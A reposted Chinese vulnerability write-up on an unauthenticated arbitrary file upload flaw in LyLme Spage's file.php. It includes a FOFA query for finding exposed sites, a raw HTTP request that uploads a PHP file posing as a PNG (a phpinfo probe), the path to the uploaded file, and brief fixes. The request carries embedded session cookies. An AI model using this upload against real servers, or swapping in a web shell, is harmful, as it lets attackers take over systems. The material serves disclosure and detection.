一、漏洞简述
六零导航页 (LyLme Spage) 致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。其file.php接口存在任意文件上传漏洞,未经身份验证的恶意攻击者可以上传任意文件,进而控制服务器系统。
二、网络测绘
fofa:title=="上网导航 - LyLme Spage"
三、漏洞复现
测试上传PHP文件
访问/files/upload/img_aqweraa2ec3c.php
四、漏洞检测poc
POST /include/file.php HTTP/2Host: 0.0.0.0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2X-Requested-With: XMLHttpRequestOrigin: http://127.0.0.1Accept: application/json, text/javascript, */*; q=0.01Cookie: X8Kk_2132_logintime=1713010988; X8Kk_2132_saltkey=sb50OXyE; X8Kk_2132_lastvisit=1713007324; XDEBUG_SESSION=PHPSTORM; admin_hkcms_lang=zh-cn; index_hkcms_lang=zh-cn; HKCMSSESSID=e0594fc037c66b2dcc477b032c98de35; PHPSESSID=jbl3he9k1riq937d993fc7luhi; admin_token=32cffj4RQkD5uVfTy3J25h8COeBWUDMFyPZMgE%2BSw2eAI1O%2FgJsuTSHq0vIvSxsREnWeNg59eXDvZU%2F6gdzPT3acrQContent-Type: multipart/form-data; boundary=---------------------------207262699182048909098055515Sec-Fetch-Mode: corsAccept-Encoding: gzip, deflate, brSec-Fetch-Dest: emptySec-Fetch-Site: same-originReferer: http://127.0.0.1/apply/Content-Length: 229-----------------------------207262699182048909098055515Content-Disposition: form-data; name="file"; filename="test.php"Content-Type: image/pngphpinfo();-----------------------------207262699182048909098055515--
五、漏洞修复
1、建议联系厂商打补丁或升级版本。
2、增加Web应用防火墙防护。
3、关闭互联网暴露面或接口设置访问权限。
原文始发于微信公众号(实战安全研究):漏洞复现 | LyLmeSpage六零导航页file.php接口任意文件上传漏洞【附poc】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论